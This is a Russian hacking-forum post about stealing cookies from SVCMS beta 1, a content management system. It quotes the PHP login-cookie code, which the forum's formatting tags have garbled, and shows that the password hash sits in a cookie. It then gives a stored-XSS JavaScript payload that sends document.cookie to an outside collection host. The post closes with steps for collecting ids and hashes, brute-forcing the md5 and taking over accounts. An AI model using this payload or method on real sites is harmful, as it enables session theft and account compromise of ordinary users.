Показать сообщение отдельно

  #465  
Старый 04.08.2011, 13:00
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 0
С нами: 10992741

Репутация: 0
По умолчанию

SVCMS beta 1 (угоняем куки)
Еще один двиг не без прибабаха...

Мега кодеры этого двига при авторизации выдают след.куки:

Код:
__qca=P0-464638314-1305237775445; crocmint_aff=697b75; 
POSTAff2Cookie=697b75_137d839c; 
POSTAff2TimeCookie=1305037573_1308127486_7; 
POSTAff2ClickCookie=d9913101; PAPR_0=1305557527_http%253A//temp/; 
SVCMS_userid=1; 
SVCMS_md5passwd=e5c72dd4eca5301feca1bb0985eed55f; 
SVCMS_randomstring=13123908414e397eb92e187; 
PHPSESSID=bmkmssmcvtbcoreee5uqj49vp6
наблюдаем это здесь(user.php):

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"].....

*[/COLOR][COLOR="#0000BB"]Set the cookies

[/COLOR][COLOR="#007700"]*/

private function[/COLOR][COLOR="#0000BB"]set_login_cookies[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$logout[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]) {

[/
COLOR][COLOR="#0000BB"]$expire_val[/COLOR][COLOR="#007700"]= ( ([/COLOR][COLOR="#0000BB"]$logout[/COLOR][COLOR="#007700"]) ? ([/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]() -[/COLOR][COLOR="#0000BB"]30[/COLOR][COLOR="#007700"]) :[/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]() +[/COLOR][COLOR="#0000BB"]1209600[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#FF8000"]// 1209600 is two weeks

[/COLOR][COLOR="#0000BB"]$randomstring[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]uniqid[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]());

[/
COLOR][COLOR="#0000BB"]$md5_pass[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'password'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#0000BB"]$randomstring[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#0000BB"]$cookies[/COLOR][COLOR="#007700"]= array(

[/
COLOR][COLOR="#DD0000"]'SVCMS_userid'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'userid'[/COLOR][COLOR="#007700"]],

[/
COLOR][COLOR="#DD0000"]'SVCMS_md5passwd'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$md5_pass[/COLOR][COLOR="#007700"],

[/
COLOR][COLOR="#DD0000"]'SVCMS_randomstring'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$randomstring[/COLOR][COLOR="#007700"],

);



foreach
([/COLOR][COLOR="#0000BB"]$cookies[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$cookie[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$cookie_value[/COLOR][COLOR="#007700"]) {

[/
COLOR][COLOR="#0000BB"]setcookie[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$cookie[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$cookie_value[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$expire_val[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]);

}

return[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];

}

.........[/COLOR][/COLOR
И в добавок к этому они оставили активную xss в комментах!

То бишь:

Код:
 img  = new Image(); img.src = "http://day.mne/svoi.kuki?ciuda="+document.cookie;
-> Регулярим id и хэш, а так же $_SERVER['HTTP_REFERER']

-> брутим хэш (md5)

-> возвращаемся на $_SERVER['HTTP_REFERER']

-> смотрим ник по id (ссылка на нике комментирующих)

-> действуем по совести
 
Ответить с цитированием